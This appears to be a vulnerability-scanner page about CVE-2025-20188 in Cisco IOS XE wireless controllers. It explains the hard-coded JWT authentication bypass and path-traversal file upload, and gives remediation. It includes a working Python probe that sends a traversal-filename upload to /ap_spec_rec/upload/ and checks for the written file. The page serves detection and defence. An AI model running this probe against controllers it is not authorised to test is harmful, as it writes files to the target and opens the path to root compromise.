CVE-2025-20188 Scanner

CVE-2025-20188 Scanner - Arbitrary File Upload vulnerability in Cisco IOS XE WLC

Short Info

Level: Critical
Single Scan: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 8 days 4 hours
Scan only one: Domain, Subdomain, IPv4
Toolbox: -

Cisco IOS XE Wireless LAN Controllers (WLC) are enterprise-grade devices that manage and control the wireless access points in an organisation's network, providing centralised configuration, security and policy enforcement for Wi-Fi. They are widely deployed in corporate, educational and government networks. Among the features the controller software offers is Out-of-Band AP Image Download, which lets access points fetch firmware images from the controller over HTTPS instead of over CAPWAP. This feature is not enabled by default, and it is the feature whose upload interface the vulnerability below lives in.

CVE-2025-20188 lets an unauthenticated remote attacker abuse the Out-of-Band AP Image Download feature because the upload interface accepts a hard-coded JSON Web Token (JWT) as proof of authentication. By sending crafted HTTPS POST requests carrying that token to the upload interface, an attacker bypasses authentication and uploads arbitrary files; because the supplied filename is not sanitised, the upload also permits path traversal, and the chain ends in execution of arbitrary commands as root, compromising the whole device. The root cause is the combination of a hard-coded authentication secret and missing validation of the uploaded filename. A controller is only exploitable if Out-of-Band AP Image Download is enabled, so the first thing to check on a candidate device is whether that feature is on.

Technically, the check sends a multipart/form-data POST request to the /ap_spec_rec/upload/ endpoint with a jwt cookie (a random or crafted token) and a file part whose filename parameter contains path traversal sequences. A 200 response from a server that identifies itself as OpenResty (the nginx/Lua stack that fronts this endpoint) indicates that the upload was accepted; on its own that is only a strong hint, so the scanner issues a follow-up GET request to see whether the uploaded file is now reachable, which confirms the arbitrary file write. Note that this is an intrusive check: it writes a file to the controller's filesystem, so it should be run with a harmless marker file and only against assets you are authorised to test. In an attacker's hands the same primitive is the first step toward full compromise of the device and, from there, the connected network.
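The following is an added example of how a scanner-style check for the request/response pattern described above can be structured; it is not the page's own scanner code. The cookie name jwt, the placeholder token value, the traversal filename and the path used for the follow-up GET are assumptions for illustration, not values taken from the vulnerability itself; the request builder and response classifier are written so they can be exercised offline against constructed responses.

```python
"""Scanner-style probe for the CVE-2025-20188 upload check.

Added example, not the original scanner's code. Assumed (not from the page):
the `jwt` cookie name, the placeholder token, the traversal filename and the
follow-up GET path are illustrative placeholders.
"""
import http.client
import secrets
import ssl
from dataclasses import dataclass, field

UPLOAD_PATH = "/ap_spec_rec/upload/"
# Placeholders (assumption): a syntactically plausible but meaningless JWT, and a
# harmless marker file name carrying the traversal sequence the page describes.
PLACEHOLDER_JWT = "eyJhbGciOiJIUzI1NiJ9.e30.placeholder"
TRAVERSAL_FILENAME = "../../tmp/cve_2025_20188_probe.txt"


@dataclass
class HttpResponse:
    """Minimal response container so the classifier can be tested offline."""
    status: int
    headers: dict = field(default_factory=dict)
    body: bytes = b""

    def header(self, name: str) -> str:
        lowered = {k.lower(): v for k, v in self.headers.items()}
        return lowered.get(name.lower(), "")


def build_multipart(filename: str, content: bytes, boundary: str) -> bytes:
    """Single-part multipart/form-data body; the filename is sent verbatim,
    traversal sequences included, which is exactly what the check relies on."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    return head + content + f"\r\n--{boundary}--\r\n".encode()


def build_probe(host: str, marker: str, token: str = PLACEHOLDER_JWT,
                filename: str = TRAVERSAL_FILENAME):
    """Return (method, path, headers, body) for the upload request."""
    boundary = "----probe" + secrets.token_hex(8)
    body = build_multipart(filename, marker.encode(), boundary)
    headers = {
        "Host": host,
        "Cookie": f"jwt={token}",
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    }
    return "POST", UPLOAD_PATH, headers, body


def classify_upload(resp: HttpResponse) -> str:
    """200 from an OpenResty front end is the 'upload accepted' signal; a 401/403
    means the token was rejected; anything else is left as unknown."""
    server = resp.header("Server").lower()
    if resp.status == 200 and "openresty" in server:
        return "likely-vulnerable"
    if resp.status in (401, 403):
        return "token-rejected"
    if resp.status == 404:
        return "no-upload-endpoint"
    return "unknown"


def confirm_followup(resp: HttpResponse, marker: str) -> bool:
    """Follow-up GET: our marker coming back with a 200 proves the file landed."""
    return resp.status == 200 and marker.encode() in resp.body


def send(host: str, method: str, path: str, headers: dict, body: bytes = b"",
         port: int = 443, timeout: float = 10.0) -> HttpResponse:
    """Live request helper (not used by the offline test). WLCs usually present
    self-signed certificates, so verification is disabled for the probe only."""
    ctx = ssl._create_unverified_context()
    conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    conn.request(method, path, body=body, headers=headers)
    r = conn.getresponse()
    return HttpResponse(r.status, dict(r.getheaders()), r.read())


def scan(host: str, followup_path: str = "/cve_2025_20188_probe.txt") -> str:
    """Run both steps against a live host. followup_path is an assumption."""
    marker = "probe-" + secrets.token_hex(8)
    method, path, headers, body = build_probe(host, marker)
    verdict = classify_upload(send(host, method, path, headers, body))
    if verdict == "likely-vulnerable":
        if confirm_followup(send(host, "GET", followup_path, {"Host": host}), marker):
            return "confirmed"
    return verdict
```

Run scan("wlc.example.internal") only against a controller you are authorised to test; the offline pieces (build_probe, classify_upload, confirm_followup) are the ones worth unit-testing, since the verdict logic is where a scanner produces false positives.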

Successful exploitation gives the attacker complete control of the WLC with root privileges, which puts the confidentiality, integrity and availability of the entire wireless infrastructure at risk: the attacker can intercept or manipulate traffic, disrupt wireless service, install persistent malware on the controller, or use it as a pivot into the rest of the organisation. Remediation is to upgrade to a fixed Cisco IOS XE release; where that cannot happen immediately, disabling the Out-of-Band AP Image Download feature removes the exposed interface (access points then fall back to downloading images over CAPWAP), and the feature's status can be checked with show running-config | include ap upgrade on the controller.
